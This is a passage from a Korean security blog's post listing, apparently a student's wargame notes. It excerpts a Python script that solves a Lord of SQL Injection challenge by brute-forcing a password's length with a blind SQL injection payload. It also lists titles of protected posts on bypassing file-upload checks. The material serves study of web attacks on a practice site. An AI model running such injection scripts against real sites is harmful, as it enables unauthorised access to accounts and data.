목록전체 글 (162)

Oh! JUN

[Lord Of SQL Injection] 7번

패스워드 길이 구하는 코드 import requests import string url = "https://los.rubiya.kr/chall/orge_bad2f25db233a7542be75844e314e9f3.php" cookie = dict(PHPSESSID="쿠키값") for i in range(1,100): param = "?pw='|| length(pw)="+str(i)+"%23" len_result = url+param response = requests.get(len_result, cookies=cookie) if response.text.find("Hello guest")>0: print("password :"+str(i)) break 패스워드 구하는 코드 import requests im..
문제풀이/Lord of SQL Injection 2022. 1. 30. 23:58
[Lord Of SQL Injection] 4번

https://los.rubiya.kr/chall/orc_60e5b360f95c1f9688e4f3a86c5dd494.php query : select id from prob_orc where id='admin' and pw=''
문제풀이/Lord of SQL Injection 2022. 1. 30. 02:45
[실습4-14]이미지 검증 우회 실습(2)(확장자별 헤더)(JPG, PNG, GIF)(미완성)

보호되어 있는 글입니다.
웹 해킹/File Upload 2021. 8. 31. 01:18
[실습4-13] 이미지 검증 우회 실습(1)

보호되어 있는 글입니다.
웹 해킹/File Upload 2021. 8. 30. 17:17
[실습4-11] WAS 취약점 악용 실습(3) 및 보안 설정 적용

보호되어 있는 글입니다.
웹 해킹/File Upload 2021. 8. 29. 01:02
[실습4-5] 확장자 검증 로직 설계 오류로 인한 보안 결함 악용 실습

보호되어 있는 글입니다.
웹 해킹/File Upload 2021. 8. 26. 01:50
[실습4-4] JSPX 확장자의 서버 사이드 스크립트에 대한 이해

보호되어 있는 글입니다.
웹 해킹/File Upload 2021. 8. 25. 23:30
[4-3] 검증되지 않은 확장자 사용을 통한 확장자 검증 로직 우회 실습(html 파일로 php 코드를 작동 시켜서 우회)

보호되어 있는 글입니다.
웹 해킹/File Upload 2021. 8. 25. 02:54
이전 Prev 1 ··· 15 16 17 18 19 20 21 Next 다음